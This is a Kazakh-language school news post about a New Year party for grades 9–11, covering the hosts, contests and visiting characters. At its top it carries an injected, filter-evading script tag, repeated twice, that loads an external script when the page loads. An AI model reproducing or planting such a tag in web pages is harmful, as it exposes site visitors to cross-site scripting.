<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

03.01.2018

Жаңа жыл –ең қызықты,қуанышты, ерекше мереке. Біздің мектебімізде 28 желтоқсан күні сағ: 18.00-21.00 аралығында 9-11 сыныптар арасында жаңа жылға арналған кеш өтті. Жаңа жылдық кешке 9-11 сыныптың оқушылары қатысты. Кешті 9 сынып оқушылары Ақниет пен Айнагуль оқушылар арасында әртүрлі сайыстар жүргізіп, көңілді де, қызықты өткізді. Кешке дисней әлемінен қонаққа Навин мен Тиана да келіп, өздерінің жылы лебіздерін білдірді. Одан әрі жүргізушілер әр сыныптан бір оқушыдан ортаға шығарып, жаңа жылымыздың сәнін келтіретін Аяз ата мен ақшақарды іздеп,тауып алып, бірге алып келу керек екенін тапсырылды. Аяз ата мен ақшақар оқушыларды жаңа жылмен құттықтап, жақсы тілектерін айтты. Аяз ата мен ақшақарға оқушылар ән айтып, би билеп, өз өнерлерін көрсетті. Мерекелік кеш өз мәресіне жетті. Жаңа жыл шаттығы мәңгілік тарқамасын! Осымен думанды кешімізді тәмамдап, әрі қарай би кешімізбен жалғастырайық!-деп жүргізушілер кешті аяқтады.

Просмотров: 435


Пікір қосу



Деректерді қолтаңбаға қосу